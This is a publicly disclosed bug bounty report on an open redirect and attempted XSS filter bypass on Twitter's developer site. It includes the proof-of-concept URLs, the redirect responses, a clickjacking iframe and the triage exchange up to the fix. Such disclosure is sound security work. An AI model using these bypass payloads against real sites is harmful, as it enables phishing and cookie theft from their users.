[dev.twitter.com] XSS and Open Redirect Protection Bypass
State Resolved (Closed)
Disclosed publicly 2019-02-07T16:32:13.022Z
Reported To
Weakness none
Bounty $1,120
Collapse


Timeline
submitted a report to Twitter .
2018-03-26T14:44:33.635Z

Description:
Hi
after I finish reading the report https://hackerone.com/reports/260744.i start to test this subdomain.i fount an interesting url [https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/basics/adding-international-support-to-your-apps%5D.this url is special,my intuition tells me that this URL may have a problem.so,i try test,amzing i found a way to bypass protection.

PoC: Open Redirect
https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/

HTTP Response:
HTTP/1.1 302 Found
location: http://www.bywalks.com
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://www.bywalks.com">http://www.bywalks.com</a>. If not click the link.

PoC: XSS
https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/javascript:alert(1)/

HTTP Response:
HTTP/1.1 302 Found
location: javascript:alert(1)
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="javascript:alert(1)">javascript:alert(1)</a>. If not click the link.

PoC: ClickJacking
<iframe src="https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/" sandbox="allow-forms"></iframe>

Impact

go fishing.steal cookie,etc

Regards,
Frans

  • 0 attachments:
bywalks Activities::Comment
2018-03-26T14:50:13.145Z
in my poc:xss location is javascript:alert(1).this will continue to jump. I'm not bypass the problem right now. i will investigate it further


bywalks Activities::Comment
2018-03-26T14:51:48.287Z
Image attach


bugtriage-michael Activities::BugNeedsMoreInfo
2018-03-27T00:21:46.706Z
Thank you for your report. We have confirmed the open redirect. We have a question about the XSS: When we navigate to https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/javascript:alert(1)/ , we see a browser error: {F278951} We believe that this error occurs because of the response header `location: javascript:alert(1)`. Per our [program rules](https://hackerone.com/twitter), "vulnerabilities only affecting users of outdated or unpatched browsers" are not eligible for this program. Does any major browser currently allow `Location` headers to use the `javascript:` URI scheme? Thank you for thinking of Twitter security.


bywalks Activities::BugNew
2018-03-27T14:48:07.265Z
Hi maybe i can't bypass your XSS defense. next i'll report my recent discovery to you. when i use this POC https://dev.twitter.com//web%2f:2/:///%01javascript:alert(1)/ Http response: HTTP/1.1 302 Found location: //web%2f:1/://dev.twitter.com/%01javascript:alert(1) .... You should be redirected automatically to target URL: <a href="%01javascript:alert(1)">javascript:alert(1)</a> i can see the html code,this is a good start,but javascript can not execute, if i can bypass this protection.i will tell you again.otherwize,you do it according to open redirection.


bywalks Activities::Comment
2018-03-27T14:50:58.639Z
the true POC is https://dev.twitter.com//web%2f:1/:///%01javascript:alert(1)/


bugtriage-michael Activities::Comment
2018-03-28T18:42:27.200Z
Thanks for following up. We're looking into this, and we'll keep you updated when we have additional information. Thank you for thinking of Twitter security.


acamacho Activities::BugTriaged
2018-04-05T19:11:01.913Z
Thank you for your report. We believe it may be a valid security issue and will investigate it further. It could take some time to find and update the root cause for an issue, so we thank you for your patience. Thank you for helping keep Twitter secure!


bywalks Activities::Comment
2018-04-17T04:56:46.248Z
any update?


Activities::BountyAwarded
2018-04-20T19:08:23.666Z
Thanks again. As mentioned we’ll keep you updated as we investigate further. As a reminder, please remember to keep the details of this report private until we have fully investigated and addressed the issue.


bywalks Activities::Comment
2018-04-21T00:58:22.870Z
thanks!


andrewsorensen Activities::BugResolved
2018-06-06T20:20:42.343Z
We consider this issue to be fixed now. Can you please confirm? Thank you for helping keep Twitter secure!


bywalks Activities::Comment
2018-06-07T00:49:04.557Z
i think it be fixed.i can not bypass it.


bywalks Activities::AgreedOnGoingPublic
2018-12-30T14:19:51.328Z


mli Activities::AgreedOnGoingPublic
2019-02-07T16:32:12.951Z


mli Activities::ReportBecamePublic
2019-02-07T16:32:13.050Z